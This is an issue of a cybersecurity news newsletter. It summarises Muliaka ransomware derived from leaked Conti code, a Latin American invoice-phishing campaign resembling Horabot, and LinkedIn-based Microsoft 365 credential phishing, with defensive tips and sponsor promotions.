Leaked Conti code utilised by ‘Muliaka’ malware

Apr 11 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s your one stop shop for cyber-bound warfare ⚔️🔪🏹🪓🔨

 Today’s hottest cybersecurity news stories:

  • 👀 To be Conti-ued… Leaked Conti code utilised by ‘Muliaka’ malware 👾

  • 💃 Latin America watch out! Their phishing lines are out in malicious force 🎣

  • 🤓 Alert! Microsoft two-Step phishing campaign targets LinkedIn users 💼

Don’t get Conti with me, mate 💀💀💀

🚨 New Ransomware Gang Strikes Russian Businesses! 🔒

A previously unknown ransomware gang, dubbed "Muliaka" by researchers at F.A.C.C.T., is targeting Russian businesses with malware derived from the leaked source code of the Conti hacking group. This elusive group, also known as Muddy Water, has been active since at least December 2023, leaving behind minimal traces of their attacks.

Intricate Attack Methodology 🎯

In a recent incident documented by F.A.C.C.T., Muliaka encrypted Windows systems and VMware ESXi virtual infrastructure of an unnamed Russian business. The attackers exploited the company's VPN service for remote access and disguised their ransomware as popular corporate antivirus software, facilitating infiltration into the targeted network.

Advanced Features of Muliaka's Malware 🛠️

Unlike the original Conti malware, Muliaka's variant is equipped with advanced functionalities. It terminates processes and halts specific system services before initiating file encryption, representing a significant evolution in malicious tools post-Conti leak.

Geopolitical Dynamics Fuel Cyberattacks 🌐

F.A.C.C.T. warns that financially motivated hacker groups, leveraging the current geopolitical situation in Russia, are intensifying their assaults. The lure of easy money combined with a lack of cybersecurity awareness among potential victims creates an environment ripe for exploitation.

Unveiling the Unknown 🕵️

Despite their efforts, researchers have yet to determine the origins or the ransom amounts demanded by Muliaka. The targeted company's response to the ransom remains undisclosed.

Stay Protected! 🛡️

Remain vigilant against phishing attempts, bolster your cybersecurity defences, and prioritise regular data backups to mitigate the risks posed by emerging ransomware threats like Muliaka. Stay informed to stay secure!

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Fresh phish; we’re reeling them in 🎣🎣🎣

🚨 Beware: Phishing Campaign Targeting Latin America Uncovered! 🎣

A recent phishing campaign has emerged, targeting the Latin American region. The devious tactic involves sending emails with ZIP file attachments, posing as invoices. Upon extraction, these files reveal HTML documents leading to malicious downloads, initiating a cascade of cyber threats.

Dissecting the Tactics 🛠️

Examining the email headers, we detected email addresses using the domain 'temporary[.]link' and noted the use of Roundcube Webmail, commonly exploited in phishing endeavours. The HTML files contain concatenated URLs, often leading to suspended pages upon access.

Unveiling the Hosts 🌐

Further investigation revealed the host IP, 89[.]116[.]32[.]138, housing newly created domains, some registered in Mexico. Accessing these URLs from Mexico-based IPs redirects to a Cloudflare captcha page, masking malicious intentions.

Malicious Payloads Uncovered 🕵️

Inside the RAR files lurk PowerShell scripts, extracting sensitive information from victims' machines. Base64 encoded strings within the scripts trigger additional URL requests, ultimately leading to malware downloads.

The Horabot Connection 🔄

This campaign exhibits striking resemblances to previous "Horabot" campaigns, reinforcing the notion of evolving tactics in phishing schemes.

Staying Vigilant 🛡️

Phishing campaigns constantly evolve to evade detection. Be cautious of email attachments or URLs, particularly those leading to suspended pages, as they may harbour hidden threats. Stay informed and maintain a vigilant stance against evolving cyber threats.

Stay Alert! 🚨

As threat actors employ increasingly sophisticated techniques, it's imperative to exercise caution with email attachments and URLs. By remaining vigilant and adopting robust cybersecurity practices, we can mitigate the risks posed by evolving phishing campaigns.

🎣 Catch of the Day!! 🌊🐟🦞

🃏 The Motley Fool: “Fool me once, shame on — shame on you. Fool me — you can't get fooled again.” Good ol’ George Dubya 😂 Let us tell who’s not fooling around though; that’s the Crüe 👀 at Motley Fool. You’d be a fool (alright, enough already! 🙈) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! 🐛 Kidding aside, if you check out their website they’ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets 🤑 (LINK)

🚵 Wander: Find your happy place. Cue Happy Gilmore flashback 🏌️⛳🌈🕊️ Mmmm Happy Place… 😇 So, we’ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, it’s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway 🏞️😍 (LINK)

🌊 Digital Ocean: If you build it they will come. Nope, we’re not talking about a baseball field for ghosts 👻🍿 (Great movie, to be fair 🙈). This is the Digital Ocean who’ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you’ll find yourself catching the buzz even if you can’t code (guilty 😑). But if you can and you’re looking for somewhere to test things out or launch something new or simply enhance what you’ve got, we’d recommend checking out their services fo’ sho 😉 And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! 🌿 (LINK)

What do you call it, garage?

What do you call it, urban?

What do you call it, two-step? 🙈🙈🙈

🚨 Tackling Social Media Threats in Browser Security 🛡️

As social media platforms like Facebook and LinkedIn seep into daily corporate communication, employees accessing personal accounts on company devices unwittingly become targets for cyber threats.

Exploiting Social Networks 🕵️

Attackers now leverage employees' social media accounts to steal personal and corporate data. For instance, a recent Python-based Snake infostealer used Facebook messages to distribute malware, aiming to hijack accounts and pilfer browsing data.

Networking Risks 🔄

LinkedIn, a hub for professional connections, is ripe for exploitation. Attackers use breached accounts to mimic trusted contacts and lure victims into clicking malicious links, ultimately stealing Microsoft 365 credentials.

Unmasking LinkedIn's Two-Step Attack 🎭

Compromised LinkedIn profiles pose as trusted contacts, tricking victims into clicking OneDrive links. These links lead to phishing pages mimicking familiar interfaces, ultimately stealing Microsoft 365 credentials, orchestrated by organised threat actors.

Advanced Browser Security 🛠️

Advanced browser security extensions, like Perception Point Enterprise Browser Security, employ AI-driven detection to thwart attacks in real-time. By leveraging image recognition and URL reputation analysis, these solutions fortify enterprise devices against evolving cyber threats.

The Imperative of Browser Security 🚨

As social media becomes a target for sophisticated threat actors, organisations must prioritise comprehensive browser security solutions. By staying vigilant and investing in advanced detection technologies, enterprises can mitigate the risk of social media-based attacks, safeguarding privacy and data integrity.

Stay Informed, Stay Secure! 🛡️

Vigilance is key in navigating social media threats. By adopting robust security measures and investing in browser security solutions, organisations can effectively safeguard their digital assets.

🗞️ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think!

So long and thanks for reading all the phish!

Recent articles